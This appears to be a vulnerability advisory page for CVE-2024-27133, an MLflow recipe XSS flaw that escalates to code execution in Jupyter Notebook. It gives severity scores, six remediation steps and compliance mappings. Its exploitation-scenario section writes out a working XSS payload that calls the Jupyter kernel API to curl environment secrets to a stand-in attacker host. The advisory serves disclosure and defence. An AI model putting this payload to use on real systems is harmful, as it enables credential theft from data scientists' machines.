CVE-2024-27133 — CRITICAL (CVSS 9.6) AI Security Vulnerability

CISO Take

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to full RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk — no credentials required from the attacker. Patch immediately via MLflow PR #10893 and audit all active recipe data source configurations.

Risk Assessment

CVSS 9.6 Critical with no authentication required and low attack complexity makes this trivially exploitable at scale. The 'Changed Scope' vector (S:C) accurately reflects how the XSS breaks out of the MLflow rendering context into Jupyter's kernel execution environment, achieving full C/I/A impact. Exposure is highest in organizations where data scientists run MLflow locally or in shared Jupyter environments with access to cloud credentials and model artifacts. No patch was available at time of publication — assess exposure now.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
mlflow	pip	—	No patch
25.7K OpenSSF 4.5 624 dependents Pushed 7d ago 24% patched ~64d to patch Full package profile →

Do you use mlflow? You're affected.

Severity & Risk

CVSS 3.1

9.6 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 42% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Changed

C High

I High

A High

Recommended Action

6 steps

PATCH

Apply MLflow fix from PR #10893 immediately. Pin to a patched version and block older versions via package policy.
DATA SOURCE CONTROLS

Enforce policies requiring only trusted, schema-validated datasets in MLflow recipes. Treat all external datasets as untrusted inputs.
JUPYTER HARDENING

Run Jupyter with Content-Security-Policy headers; consider JupyterHub with isolated kernels per user and no shared kernel access.
NETWORK SEGMENTATION

Data science environments should not have broad lateral access to production systems or credential stores.
DETECTION

Monitor Jupyter kernel execution for unusual outbound network connections or subprocess spawning following dataset load events. Audit kernel execution logs.
CREDENTIALS

Rotate credentials accessible from data science workstations as a precaution if exposure window was open.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework AML.T0002.000 - Datasets AML.T0010.002 - Data AML.T0011 - User Execution AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2 - Data for AI systems A.9.3 - Information security for AI systems

NIST AI RMF

GOVERN 1.7 - Organizational processes to address AI risks MANAGE 3.2 - Risk treatment in AI development environments

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-27133?

MLflow's recipe pipeline renders dataset table fields without sanitization, allowing a crafted dataset to execute JavaScript in Jupyter Notebook and escalate to full RCE on the data scientist's machine. Any team running MLflow recipes against external or third-party datasets is at risk — no credentials required from the attacker. Patch immediately via MLflow PR #10893 and audit all active recipe data source configurations.

Is CVE-2024-27133 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-27133, increasing the risk of exploitation.

How to fix CVE-2024-27133?

1. PATCH: Apply MLflow fix from PR #10893 immediately. Pin to a patched version and block older versions via package policy. 2. DATA SOURCE CONTROLS: Enforce policies requiring only trusted, schema-validated datasets in MLflow recipes. Treat all external datasets as untrusted inputs. 3. JUPYTER HARDENING: Run Jupyter with Content-Security-Policy headers; consider JupyterHub with isolated kernels per user and no shared kernel access. 4. NETWORK SEGMENTATION: Data science environments should not have broad lateral access to production systems or credential stores. 5. DETECTION: Monitor Jupyter kernel execution for unusual outbound network connections or subprocess spawning following dataset load events. Audit kernel execution logs. 6. CREDENTIALS: Rotate credentials accessible from data science workstations as a precaution if exposure window was open.

What systems are affected by CVE-2024-27133?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, data science notebooks, MLOps platforms.

What is the CVSS score for CVE-2024-27133?

CVE-2024-27133 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.20%.

Technical Details

NVD Description

Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table fields.

Exploitation Scenario

An adversary with the ability to influence a dataset — via a compromised data pipeline, a malicious public dataset, or a supply chain attack on a data vendor — injects an XSS payload into a column header or cell value, for example: <img src=x onerror="fetch('/api/kernels/KERNEL_ID/execute',{method:'POST',body:JSON.stringify({code:'import subprocess;subprocess.run(["curl","https://attacker.com/exfil?h="+open("/proc/1/environ").read()])'})})"> When a data scientist runs an MLflow recipe referencing this dataset inside Jupyter Notebook, MLflow renders the dataset table without HTML encoding. The payload executes in the notebook's browser context (same origin as the Jupyter server), calls the Jupyter REST kernel API, and injects arbitrary Python code into the running kernel. The attacker achieves silent RCE on the data scientist's machine with no visible indicators — gaining access to ML model weights, training data, and cloud provider credentials stored in environment variables.